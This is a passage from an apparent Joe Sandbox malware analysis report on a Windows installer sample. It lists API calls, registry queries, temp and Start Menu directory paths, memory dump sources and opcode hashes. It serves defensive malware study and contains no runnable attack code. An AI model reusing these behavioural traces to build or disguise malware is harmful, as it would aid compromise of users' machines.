                                                                                                                                        • Part of subcall function 00405A0B: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,?,00405A77,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,751D3410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A19
                                                                                                                                        • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A1E
                                                                                                                                        • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A32
                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                                                        • Part of subcall function 004055C7: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040560A
                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae,00000000,00000000,000000F0), ref: 0040163C
                                                                                                                                      Strings
                                                                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae, xrefs: 00401631
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae
                                                                                                                                      • API String ID: 1892508949-1223762460
                                                                                                                                      • Opcode ID: 54bd2716cff20c5ce2502cd1f1846264e2b1d456c8e0a835d425a5356db0bc86
                                                                                                                                      • Instruction ID: 3a09c20382928311ba1d31a626229d1df209b5e1cddac7105c79dbf72218ebe6
                                                                                                                                      • Opcode Fuzzy Hash: 54bd2716cff20c5ce2502cd1f1846264e2b1d456c8e0a835d425a5356db0bc86
                                                                                                                                      • Instruction Fuzzy Hash: B4112731508141EBCB212FB94D4197F36B0EA96325F28453FE4D2B23E2D63D49429A3F
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,00406105,80000002), ref: 00405F07
                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,00406105,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll), ref: 00405F12
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                      • String ID: Call
                                                                                                                                      • API String ID: 3356406503-1824292864
                                                                                                                                      • Opcode ID: abfb1157869b45efbda80eaac2ce6d2ce1cd77193e8e6ff114ced4d7fd94e931
                                                                                                                                      • Instruction ID: 897067c620da28adabf34c96f4b8630bfa599ba4fb7ce992f063a5310404d611
                                                                                                                                      • Opcode Fuzzy Hash: abfb1157869b45efbda80eaac2ce6d2ce1cd77193e8e6ff114ced4d7fd94e931
                                                                                                                                      • Instruction Fuzzy Hash: 6D015A7251020AABEF22CF61CC09FDB3BACEF55364F004026FA55A2190D278DA54CBA4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 03e86151e03bba78afe16222fe9d5ebe1cb7bbef763218a955a86232309b7881
                                                                                                                                      • Instruction ID: 81ce818a04e0c3cc04ce684d9a2a9ddfd009c22adec174195ca66df60ea86fc9
                                                                                                                                      • Opcode Fuzzy Hash: 03e86151e03bba78afe16222fe9d5ebe1cb7bbef763218a955a86232309b7881
                                                                                                                                      • Instruction Fuzzy Hash: 69A14271E00229DBDF28CFA8C8446ADBBB1FF44305F15842AD916BB281C7789A96DF44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 48eeb96149e0d88395d78aa931bb38ded32ae5716a52e0a7ec155fc571e56ba0
                                                                                                                                      • Instruction ID: 08e1f0bd3e012b2653e952fb076f5459688999f8fa16d8000732ef154d800f7e
                                                                                                                                      • Opcode Fuzzy Hash: 48eeb96149e0d88395d78aa931bb38ded32ae5716a52e0a7ec155fc571e56ba0
                                                                                                                                      • Instruction Fuzzy Hash: 53912370E00229CBEF28CF98C8547ADBBB1FF44305F15816AD956BB281C7789A96DF44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1a29bcf112b88c1b93ae01eb1cff818f8e5d0edf1da40eda35da1d05f3be857d
                                                                                                                                      • Instruction ID: f9b0e14a80994b8e3cce9b061f2e265d206a391058c15f1564a8a9ac8da356b6
                                                                                                                                      • Opcode Fuzzy Hash: 1a29bcf112b88c1b93ae01eb1cff818f8e5d0edf1da40eda35da1d05f3be857d
                                                                                                                                      • Instruction Fuzzy Hash: 80814571D04229DFDF24CFA8C8847ADBBB1FB44305F25816AD816BB281C7789A96DF44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ec6a1127f337a9cd102a75f31ecac58d5a9bcb7082b0f725788ddd98255f1a75
                                                                                                                                      • Instruction ID: 64fae73fcf261b5a29c0697abf595a3f572636c651b32177eb72ec05398ad39b
                                                                                                                                      • Opcode Fuzzy Hash: ec6a1127f337a9cd102a75f31ecac58d5a9bcb7082b0f725788ddd98255f1a75
                                                                                                                                      • Instruction Fuzzy Hash: 39817831D04229DBEF24CFA8D8447ADBBB0FB44305F21816AD856BB2C1C7789A96DF44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e7ab0f5182b65f417a428d3e5ace57518a098f994e057f816ecf8909cd511bbd
                                                                                                                                      • Instruction ID: 51e77fe0f08f8d7ba03d7e1561fc41eb13955110d3fdee4e61b85cd17e52ee3e
                                                                                                                                      • Opcode Fuzzy Hash: e7ab0f5182b65f417a428d3e5ace57518a098f994e057f816ecf8909cd511bbd
                                                                                                                                      • Instruction Fuzzy Hash: C4712371D04229DBEF28CF98C8447ADBBB1FB44305F15806AD806BB281D7789A96DF44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d154c6f6c8b8bff782c781b6862f01632ca8036cc5e59350156e3961b0956316
                                                                                                                                      • Instruction ID: 3517892101dd69bd75e64738494877d03a8317e446f0652336487a17687a2cae
                                                                                                                                      • Opcode Fuzzy Hash: d154c6f6c8b8bff782c781b6862f01632ca8036cc5e59350156e3961b0956316
                                                                                                                                      • Instruction Fuzzy Hash: 53712571E04229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281D7789996DF44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 90803f23476dcfb414c0400bb9d8b7cdb0b3ca45f440242c86af8c4d62fdd6e9
                                                                                                                                      • Instruction ID: 34c5161cf4e4322df4c522de15ced9ded486b5ca7425d8c28145854c0c0886a7
                                                                                                                                      • Opcode Fuzzy Hash: 90803f23476dcfb414c0400bb9d8b7cdb0b3ca45f440242c86af8c4d62fdd6e9
                                                                                                                                      • Instruction Fuzzy Hash: 29714571D04229DBEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 004062DD: FindFirstFileA.KERNELBASE(751D3410,00421558,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00405AA3,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,751D3410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,751D3410,C:\Users\user\AppData\Local\Temp\), ref: 004062E8
                                                                                                                                        • Part of subcall function 004062DD: FindClose.KERNEL32(00000000), ref: 004062F4
                                                                                                                                      • lstrlenA.KERNEL32 ref: 004022F2
                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 004022FC
                                                                                                                                      • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402324
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1486964399-0
                                                                                                                                      • Opcode ID: d2ded405d62ae805881579f4b3fa0f6d32604239724b875ac766ac1e54bcc50d
                                                                                                                                      • Instruction ID: e190a191dd6904399be212acf1c509ba618b837bf102c15a3da6bfbe2c681905
                                                                                                                                      • Opcode Fuzzy Hash: d2ded405d62ae805881579f4b3fa0f6d32604239724b875ac766ac1e54bcc50d
                                                                                                                                      • Instruction Fuzzy Hash: E6112A71E04318AACB00EFB98949A8EBBB9EF04318F10407BA405FB2D2D6BCD540CB59
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040257E
                                                                                                                                      • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 00402591
                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000000,00000011,00000002), ref: 004025A9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Enum$CloseValue
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 397863658-0
                                                                                                                                      • Opcode ID: 8d3a1cd54caa8d1fdba4ab421f0a15f787f245c239668e29e6e22b939a192df5
                                                                                                                                      • Instruction ID: 35fd857a3e442691b1a787247be78dd7b49a46040516f967143c2ea575d22cfd
                                                                                                                                      • Opcode Fuzzy Hash: 8d3a1cd54caa8d1fdba4ab421f0a15f787f245c239668e29e6e22b939a192df5
                                                                                                                                      • Instruction Fuzzy Hash: 5801B1B1905204FFE7119F659E89ABF7ABCEB40344F10443EF402B62C0D6B85E019669
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040250A
                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000000,00000011,00000002), ref: 004025A9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3356406503-0
                                                                                                                                      • Opcode ID: b00cdceb79a367ba246cd9f8507522f39a7060d96376a61327adf18ce8985981
                                                                                                                                      • Instruction ID: 8f3c8c2c6778634c6bf67ed2425ae169c6cf17cae75ec7db2a606e7394f4df6a
                                                                                                                                      • Opcode Fuzzy Hash: b00cdceb79a367ba246cd9f8507522f39a7060d96376a61327adf18ce8985981
                                                                                                                                      • Instruction Fuzzy Hash: 36118F71905205FEDB11CF64CA5D5AEBAB4AF15344F60447FE042B62C0D2B88A45DB2E
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
